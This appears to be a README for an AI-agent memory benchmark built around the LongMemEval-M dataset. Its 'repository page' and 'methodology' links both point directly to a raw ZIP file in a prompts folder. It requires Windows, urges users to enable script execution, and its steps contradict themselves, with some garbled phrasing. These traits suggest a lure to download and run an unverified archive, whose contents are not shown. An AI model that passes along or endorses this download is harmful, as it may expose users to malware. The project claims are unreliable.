This project provides tools to test and measure how well AI agents recall information. It tracks performance on the LongMemEval-M dataset. You can use these benchmarks to verify accuracy and test memory consistency. The system currently achieves 71.7 percent accuracy on the primary test set.
Artificial intelligence agents often struggle to remember context over long sessions. This software provides a standardized way to check those memory gaps. By running these benchmarks, you can see how different configurations handle complex knowledge graphs and retrieval tasks. This repository contains the code needed to replicate existing studies on AI memory and agent performance.
You need a Windows computer to run these benchmarks. Ensure your system meets the following specifications:
- Operating System: Windows 10 or Windows 11.
- Processor: A modern multi-core processor from Intel or AMD.
- Memory: 8 gigabytes of RAM or more.
- Storage: 2 gigabytes of free space for the evaluation files and environment.
- Software: You must have Python installed. If you do not have it, the setup process will guide you.
Follow these steps to set up the software on your computer.
- Visit the repository page to download the software: https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip
- Look for the green button labeled Code and select Download ZIP.
- Save the file to your computer.
- Extract the contents of the ZIP folder into a dedicated location, such as your Documents folder.
Open your terminal or command prompt to finish the setup.
- Open the folder where you extracted the files.
- Hold the Shift key and right-click inside the folder.
- Select Open PowerShell window here or Open in Terminal.
- Type the command
pip install -r requirements.txtand press Enter. - Wait for the process to finish. This installs the necessary components to run the benchmarks.
Once you finish the installation, you can start the evaluation process.
- Return to the terminal window.
- Type
python main.pyand press Enter. - The system will load the LongMemEval-M dataset.
- Follow the prompts on your screen to select the specific agent model you wish to test.
- The software will process the memory sequences and output the accuracy score.
The benchmark outputs a report at the end of the run. This report breaks down performance by memory type and retrieval success.
- Total Accuracy: The percentage of questions the agent answered correctly.
- Latency: The time the agent took to recall specific information.
- Knowledge Graph Integrity: A measure of how well the agent maintained logical connections between data points.
If your score differs from the documented 71.7 percent, check your system inputs. Sometimes, different versions of the agent model produce vary slightly in their memory performance.
What if the program stops during the benchmark? Check your internet connection. Some tests download small samples from the dataset during the first run.
How do I update the software? Delete your current folder and download the latest version from the link above. This ensures you use the most current benchmarks.
Can I use this for my own models? Yes. Place your model files in the models folder and update the configuration file in the main directory.
data/: Contains the evaluation datasets.models/: Stores the agent configurations.results/: Saves your report files after a test.main.py: The entry point for starting the benchmark application.requirements.txt: Lists the software tools required to run the code.
This project relies on established data standards. Reference the document at https://github.com/Bovirulent551/agentbrain-benchmarks/raw/refs/heads/main/prompts/agentbrain-benchmarks-v2.0.zip for formal background on the methodology. The project uses version 3 of the evaluation suite. Use these tools to maintain consistency across your own research and testing cycles.
Focus on creating reproducible environments when testing agent memory. Minor changes to the random seed or the graph structure will change your results. Record these settings alongside your scores to ensure others can verify your work.
If you encounter errors during the file installation, ensure your user profile has permission to run scripts on your Windows machine. Most errors stem from path naming issues or existing installations of Python preventing new updates.
This repository supports the dream-cycle and RAG memory architectures. If your agent uses custom retrieval methods, you must wrap those functions in the interface provided in the base directory. This allows the benchmarking tool to bridge your model with the standard test suite.